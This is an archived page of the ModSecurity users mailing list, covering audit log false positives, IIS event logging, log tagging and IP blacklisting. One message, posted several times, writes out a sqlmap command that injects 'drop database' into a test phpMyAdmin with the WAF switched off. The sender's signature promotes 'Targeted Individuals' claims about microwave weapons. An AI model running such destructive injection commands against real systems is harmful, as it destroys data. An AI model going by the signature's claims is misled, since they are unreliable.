form-data;
name=\"q\"\r\n\r\n#\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data;
name=\"option\"\r\n\r\ncom_contenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data;
name=\"Itemid\"\r\n\r\n647\r\n------WebKitFormBoundary85SDZfedhQBpvDB6\r\nContent-Disposition:
form-data;
name=\"task\"\r\n\r\nbuscarContenido\r\n------WebKitFormBoundary85SDZfedhQBpvDB6--\r\n","headers":{"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8","Cache-Control":"max-age=0","Content-Type":"multipart/form-data;
boundary=----WebKitFormBoundary85SDZfedhQBpvDB6","User-Agent":"Mozilla/5.0
(X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko)
Chrome/73.0.3683.75
Safari/537.36","DNT":"1","Origin":"http://www.bomberos.cl","Upgrade-Insecure-Requests":"1","Referer":"http://www.bomberos.cl/informacion-general-de-bomberos","Content-Length":"441","Host":"www.bomberos.cl","Accept-Encoding":"gzip,
deflate","Cookie":"3207237d144523bf443786e09bde1502=plvhocs15n7eqp53og9mv9oq35;
__utma=153413291.1309598240.1555956994.1555956994.1555956994.1;
__utmc=153413291;
__utmz=153413291.1555956994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);
__utmt=1;
__utmb=153413291.7.10.1555956994","Accept-Language":"es-MX,es;q=0.9,en-US;q=0.8,en;q=0.7,es-419;q=0.6","Connection":"close"}},"response":{"http_code":403},"producer":{"*modsecurity":"ModSecurity
v3.0.3 (Linux)","connector":"ModSecurity-nginx
v1.0.0","secrules_engine":"Enabled","components":["OWASP_CRS/3.1.0\""**]*},"messages":[{"message":"GET
or HEAD Request with Body Content.","details":{"match":"Matched
\"Operator `Rx' with parameter `^0?$' against variable
`REQUEST_HEADERS:Content-Length' (Value: `441'
)","reference":"o0,3v0,3v84,3","ruleId":"*920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0*","rev":"","tags":[],"maturity":"0","accuracy":"0"}},{"message":"GET
or HEAD Request with Body Content.","details":{"match":"Matched
\"Operator `Rx' with parameter `^0?$' against variable
`REQUEST_HEADERS:Content-Length' (Value: `441'
)","reference":"o0,3v0,3v84,3","ruleId":"920170","file":"/opt/waf/nginx/etc/modsec_rules/www.bomberos.cl/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf","lineNumber":"229","data":"GET","severity":"2","ver":"OWASP_CRS/3.1.0","rev":"","tags":["application-multi","language-multi","platform-multi","attack-protocol","OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ","CAPEC-272"],"maturity":"0","accuracy":"0"}}]}}

Does anyone having the same issue ?

I haven't updated the components in a few months, maybe in a new version
this is fixed.

Cheers.

Chris.

[mod-security-users] ezNetScan - Network Scanning Tool for Android

[Don C. <don...@gm...>]

ezNetScan is a network scanning tool, it scans wireless network and
displays the list of all devices that are connected to your network.

Available on Google Play:
https://play.google.com/store/apps/details?id=com.vrsspl.eznetscan

Re: [mod-security-users] ModSecurity + IIS - Disabling Event Logging

[Osama E. <oel...@gm...>]

Found that only Error logs + health info is sent to the Event Logs so
disabling error logs solved it (nolog).  That’s also why they weren’t
sanitized.  Thanks.

-- 
Osama Elnaggar

On April 19, 2019 at 10:25:21 PM, Osama Elnaggar (oel...@gm...)
wrote:

Hi,

When running ModSecurity on IIS, I was wondering if there was any way to
disable event logging for audit logs.  Is there some option to disable
this?  I would prefer that only health-related data be sent to the Event
Log such as if ModSecurity failed to start, etc. while normal audit logs be
sent to a file that I can then forward to my SIEM.  I’m able to send audit
logs to another file but they are still mirrored to the event log as well.

Also, from my limited testing, it appears that arguments are not sanitized
when sent to the Windows Event Log which is a concern.  The normal audit
log (modsec_audit.log) sanitizes them properly but not the event log.  Is
this a known issue?

Thanks.

-- 
Osama Elnaggar

[mod-security-users] ModSecurity + IIS - Disabling Event Logging

[Osama E. <oel...@gm...>]

Hi,

When running ModSecurity on IIS, I was wondering if there was any way to
disable event logging for audit logs.  Is there some option to disable
this?  I would prefer that only health-related data be sent to the Event
Log such as if ModSecurity failed to start, etc. while normal audit logs be
sent to a file that I can then forward to my SIEM.  I’m able to send audit
logs to another file but they are still mirrored to the event log as well.

Also, from my limited testing, it appears that arguments are not sanitized
when sent to the Windows Event Log which is a concern.  The normal audit
log (modsec_audit.log) sanitizes them properly but not the event log.  Is
this a known issue?

Thanks.

-- 
Osama Elnaggar

Re: [mod-security-users] How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

[Christian V. <cv...@it...>]

Hi, there is a tons of post about how to use sqlmap in google and youtube.

This list is to disccuss things about modsecurity.

Cheers.

El 17-04-19 a las 10:24, Turritopsis Dohrnii Teo En Ming escribió:
> Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?
>
> Good evening from Singapore,
>
> Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).
>
> We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.
>
> Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.
>
> Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.
>
> Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.
>
> No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.
>
> $ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"
>
> Replace database by database name.
>
> May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.
>
> Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.
>
> Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?
>
> Please advise.
>
> Thank you very much.
>
> -----BEGIN EMAIL SIGNATURE-----
>
> The Gospel for all Targeted Individuals (TIs):
>
> [The New York Times] Microwave Weapons Are Prime Suspect in Ills of
> U.S. Embassy Workers
>
> Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html
>
> ********************************************************************************************
>
> Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic
> Qualifications as at 14 Feb 2019
>
> [1] https://tdtemcerts.wordpress.com/
>
> [2] https://tdtemcerts.blogspot.sg/
>
> [3] https://www.scribd.com/user/270125049/Teo-En-Ming
>
> -----END EMAIL SIGNATURE-----
>
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

[Reindl H. <h.r...@th...>]

Am 17.04.19 um 16:24 schrieb Turritopsis Dohrnii Teo En Ming:
> Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

are you the finally done with posting the same message to several
mailing lists and that more than once?

[mod-security-users] How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

[Turritopsis D. T. En M. <ce...@te...>]

Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.

No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of
U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic
Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/

[2] https://tdtemcerts.blogspot.sg/

[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----

[mod-security-users] How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

[Turritopsis D. T. En M. <ce...@te...>]

Subject/Topic: How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported that their MySQL database has been found missing or was deleted a few times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of the regular user, root user, and MySQL database user root. We have also examined /var/log/auth.log and think that the hacker could not have come in through ssh or sftp over ssh. From /var/log/mysql/error.log, we can ascertain that the MySQL database has been deleted at certain timings. We have also found nothing abnormal after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing passwords, the hacker was still able to delete our customer's MySQL database again and again. I have already proposed to install ModSecurity Open Source Web Application Firewall (WAF) to defend against web application attacks but my boss has told me to put that on hold at the moment. In fact, I have already deployed ModSecurity 2.9.0 on a Ubuntu 16.04 LTS *Testing* server and found that it actively detects and logs Nessus and sqlmap vulnerability scans in blocking mode.

Since we did not find any evidence that the hacker had breached our customer's Ubuntu 16.04 LTS production server through ssh or Teamviewer, we suspect that the hacker could have achieved it by SQL injection. I took the initiative of downloading and installing Nessus Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability scan report generated by Nessus Web Application Tests shows that our customer is using a version of phpMyAdmin prior to 4.8.5 which could be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04 LTS Linux server with a Testing MySQL database and a Testing phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because this version was reported to be vulnerable to SQL injection using the designer feature, and our customer is using a vulnerable version, according to CVE-2019-6798 ( https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to download and execute sqlmap on our Ubuntu Linux desktop against our Testing server.

No matter how many commands I try, sqlmap always report that phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the wrong sqlmap commands all the time? The following is one of the many sqlmap commands I have used.

$ python sqlmap.py -u "https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1 --dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would like to know if I can successfully drop/delete the Testing database on our Testing server. If I can successfully drop/delete the Testing MySQL database using sqlmap, I would be able to conclude that the hacker must have carried out SQL injection to drop/delete the customer's database. I have already turned off the Testing ModSecurity Web Application Firewall on our Testing server to allow sqlmap to go through.

Please point me to any good tutorial on SQL injection using sqlmap. Maybe I do not understand SQL injection well enough. Our customer is also using a customised in-house inventory management system that relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion Prevention System (IPS) be able to detect and block SQL injection as well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of
U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic
Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/

[2] https://tdtemcerts.blogspot.sg/

[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----

[mod-security-users] How do I determine if versions of phpMyAdmin before 4.8.5 is SQL Injectable using sqlmap?

[Turritopsis D. T. En M. <tdt...@gm...>]

Subject/Topic: How do I determine if versions of phpMyAdmin before
4.8.5 is SQL Injectable using sqlmap?

Good evening from Singapore,

Our customer (company name is Confidential/not disclosed) reported
that their MySQL database has been found missing or was deleted a few
times. They are using Ubuntu 16.04 LTS Linux server with Apache2 Web
Server, MySQL and PHP (LAMP).

We responded to these security incidents by changing the passwords of
the regular user, root user, and MySQL database user root. We have
also examined /var/log/auth.log and think that the hacker could not
have come in through ssh or sftp over ssh. From
/var/log/mysql/error.log, we can ascertain that the MySQL database has
been deleted at certain timings. We have also found nothing abnormal
after examining /var/log/apache2/access.log.

Even though we have secured the Ubuntu Linux server by changing
passwords, the hacker was still able to delete our customer's MySQL
database again and again. I have already proposed to install
ModSecurity Open Source Web Application Firewall (WAF) to defend
against web application attacks but my boss has told me to put that on
hold at the moment. In fact, I have already deployed ModSecurity 2.9.0
on a Ubuntu 16.04 LTS *Testing* server and found that it actively
detects and logs Nessus and sqlmap vulnerability scans in blocking
mode.

Since we did not find any evidence that the hacker had breached our
customer's Ubuntu 16.04 LTS production server through ssh or
Teamviewer, we suspect that the hacker could have achieved it by SQL
injection. I took the initiative of downloading and installing Nessus
Professional 8.3.1 Trial version for Windows 64-bit. The vulnerability
scan report generated by Nessus Web Application Tests shows that our
customer is using a version of phpMyAdmin prior to 4.8.5 which could
be vulnerable to SQL injection using the designer feature.

Further research shows that I can use sqlmap to determine if
phpMyAdmin is SQL injectable. I already have a Testing Ubuntu 16.04
LTS Linux server with a Testing MySQL database and a Testing
phpMyAdmin 4.8.4. I have purposely installed phpMyAdmin 4.8.4 because
this version was reported to be vulnerable to SQL injection using the
designer feature, and our customer is using a vulnerable version,
according to CVE-2019-6798 (
https://nvd.nist.gov/vuln/detail/CVE-2019-6798 ). Then I proceeded to
download and execute sqlmap on our Ubuntu Linux desktop against our
Testing server.

No matter how many commands I try, sqlmap always report that
phpMyAdmin 4.8.4 is *NOT* SQL injectable. Perhaps I was using the
wrong sqlmap commands all the time? The following is one of the many
sqlmap commands I have used.

$ python sqlmap.py -u
"https://www.EXAMPLE.com/phymyadmin/index.php?id=1" --level=1
--dbms=mysql --sql-query="drop database"

Replace database by database name.

May I know what is the correct sqlmap command that I should use to
determine that my Testing phpMyAdmin 4.8.4 is SQL injectable? I would
like to know if I can successfully drop/delete the Testing database on
our Testing server. If I can successfully drop/delete the Testing
MySQL database using sqlmap, I would be able to conclude that the
hacker must have carried out SQL injection to drop/delete the
customer's database. I have already turned off the Testing ModSecurity
Web Application Firewall on our Testing server to allow sqlmap to go
through.

Please point me to any good tutorial on SQL injection using sqlmap.
Maybe I do not understand SQL injection well enough. Our customer is
also using a customised in-house inventory management system that
relies on PHP application and MySQL database.

Would open source Snort Intrusion Detection System (IDS) and Intrusion
Prevention System (IPS) be able to detect and block SQL injection as
well?

Please advise.

Thank you very much.

-----BEGIN EMAIL SIGNATURE-----

The Gospel for all Targeted Individuals (TIs):

[The New York Times] Microwave Weapons Are Prime Suspect in Ills of
U.S. Embassy Workers

Link: https://www.nytimes.com/2018/09/01/science/sonic-attack-cuba-microwave.html

********************************************************************************************

Singaporean Mr. Turritopsis Dohrnii Teo En Ming's Academic
Qualifications as at 14 Feb 2019

[1] https://tdtemcerts.wordpress.com/

[2] https://tdtemcerts.blogspot.sg/

[3] https://www.scribd.com/user/270125049/Teo-En-Ming

-----END EMAIL SIGNATURE-----

Re: [mod-security-users] Problem with message in EventLog

[Christian F. <chr...@ne...>]

Hello Claude,

Good one. If you are satisfied with the info as a tag, then this is a nice
solution. I thought you _needed_ it in the "hostname" field.

Cheers,

Christian

On Sun, Apr 14, 2019 at 06:44:43PM +0000, Claude Cocault wrote:
> Hi Christian
> 
> Yes we can
> 
> In crs-setup.conf i change
> SecDefaultAction "phase:1,log,auditlog,pass"
> SecDefaultAction "phase:2,log,auditlog,pass"
> by
> SecDefaultAction "phase:1,log,auditlog,pass,tag:'VirtualHost: %{request_headers.host}'"
> SecDefaultAction "phase:2,log,auditlog,pass,tag:'VirtualHost: %{request_headers.host}'"
> And i obtain:
> [client x.x.x.x] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "C:\/Program Files/ModSecurity IIS/owasp_crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "57"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 15)"] [severity "CRITICAL"] [tag "VirtualHost: test-xss.gi3f.fr"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "TEST-WEB"] [uri "/verif.php"] [unique_id "18230571293743251474"]
> 
> where i get [tag "VirtualHost: test-xss.gi3f.fr"] in the log message
> 
> Thanks
> 
> Best regards
> 
> ________________________________
> De : Ervin Hegedüs <ai...@gm...>
> Envoyé : dimanche 14 avril 2019 12:26
> À : mod...@li...
> Objet : Re: [mod-security-users] Problem with message in EventLog
> 
> Hi Claude,
> 
> On Sun, Apr 14, 2019 at 09:01:27AM +0000, Claude Cocault wrote:
> > Hi Christian,
> >
> > Thank you for your answer.
> > Maybe a future evolution ?
> 
> in V3 (aka libmodsecurity3) there is possible to log the custom
> fields, but it depends the application developer - so in
> simplifying at all, also needs to code :).
> 
> 
> 
> a.
> 
> 
> 
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://nam02.safelinks.protection.outlook.com/?url=https%3A%2F%2Flists.sourceforge.net%2Flists%2Flistinfo%2Fmod-security-users&amp;data=02%7C01%7C%7C813b851d46d64cb0f07308d6c0c3ec26%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636908345038343879&amp;sdata=W%2Ba41%2FKPUjQ8OvqaHiaONRtNpAWa0LCFwrU2zyyNdMg%3D&amp;reserved=0
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> https://nam02.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.modsecurity.org%2Fprojects%2Fcommercial%2Frules%2F&amp;data=02%7C01%7C%7C813b851d46d64cb0f07308d6c0c3ec26%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636908345038353884&amp;sdata=qaAIaj1dUC4WRQ53XTA6%2FdR%2BBjigXILJUk3qfi2g6gU%3D&amp;reserved=0
> https://nam02.safelinks.protection.outlook.com/?url=http%3A%2F%2Fwww.modsecurity.org%2Fprojects%2Fcommercial%2Fsupport%2F&amp;data=02%7C01%7C%7C813b851d46d64cb0f07308d6c0c3ec26%7C84df9e7fe9f640afb435aaaaaaaaaaaa%7C1%7C0%7C636908345038353884&amp;sdata=TyW%2FFegJM3qjr%2B4CR%2FltiZbeA8uT44FfU2RRcuGkS6M%3D&amp;reserved=0


> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/

Re: [mod-security-users] Parse JSON response and put ip on blacklist for xy minutes

[Boris K. <bor...@gm...>]

Ervin thanks.

On Mon, 15 Apr 2019, 13:58 Ervin Hegedüs, <ai...@gm...> wrote:

> Hi Boris,
>
> On Mon, Apr 15, 2019 at 01:45:37PM +0200, Boris Kočar wrote:
> > Hi, thanks all for answer. i found something similer.
> >
> >
> https://www.nginx.com/blog/dynamic-ip-blacklisting-with-nginx-plus-and-fail2ban/
> >
> >
> > need to think how to cluster fail2ban or iptables if there is 2 or more
> > nginx.
>
> I think you just have to care with fail2ban - and there are so much
> good post on internet, eg.:
>
> https://www.blackhillsinfosec.com/configure-distributed-fail2ban/
>
>
>
> a.
>
>
>
> _______________________________________________
> mod-security-users mailing list
> mod...@li...
> https://lists.sourceforge.net/lists/listinfo/mod-security-users
> Commercial ModSecurity Rules and Support from Trustwave's SpiderLabs:
> http://www.modsecurity.org/projects/commercial/rules/
> http://www.modsecurity.org/projects/commercial/support/
>